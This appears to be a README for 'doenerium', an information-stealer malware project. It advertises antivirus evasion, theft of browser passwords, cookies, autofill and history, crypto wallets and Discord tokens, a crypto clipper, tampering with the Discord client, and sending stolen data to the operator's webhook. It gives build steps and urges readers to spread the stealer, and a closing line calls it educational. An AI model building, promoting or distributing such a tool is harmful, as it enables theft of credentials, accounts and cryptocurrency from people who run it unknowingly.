- Fully undetected (0/65 detects)
- Very detailed user info (PC hostname, CPU, RAM, ...)
- Sends a screenshot to your webhook when executing the stealer
- Grabs executable info (path where the .exe was executed, ...)
- Searches for wallets in system and grabs them
- Grabs passwords, cookies, bookmarks & Extension cookies from all major browsers (Chrome, Opera, Brave, Yandex, Microsoft Edge)
- Silently saves all data separate in a zip file in a hidden folder and sends it to your webhook
- Modifies discord's desktop core (like known grabbers such as bbystealer & PirateStealer aka. Brooklyn/Arizona)
- Checks for debugging processes to avoid your webhook skid being reversed from skids (loop)
- Ultra high quality obfuscation
- Easy to setup (just modify the "config.js" file)
- Sends everything to your webhook in beautiful embeds
- Analyzes the data which was stolen and sends a zip file to your discord webhook
- Browser autofill grabber
- Browser history grabber
- Crypto clipper
- Searches for keywords in cookies, passwords, autofill and lists them on the top of the cookie/password/autofill log files
- Validates found discord tokens & if they work they only get sent to your webhook
- Discord backup codes finder
- Download the files
- Install NodeJS and Visual Studio and C++ in Visual Studio
- Install the required packages by running
- Edit the
file and put your webhooks in it - Run the
file and an .exe file nameddoenerium-win.exe
will be created - Spread the stealer and enjoy my fully undetected stealer 😳
- Exodus wallet injection (get the password whenever the user logs in the wallet)
- More grabbers (VPN's, Gaming, Messengers)
- Keylogger
- Growtopia stealer
- Discord bot to build within discord ($build <webhook_url>)
- Dynamic encryption
- Stealerium
- PirateStealer & bbystealer
By downloading this, you agree to the Commons Clause license and that you're not allowed to sell this repository or any code from this repository. For more info see https://commonsclause.com/.
I am not responsible for any damages this software may cause. This was made for personal education.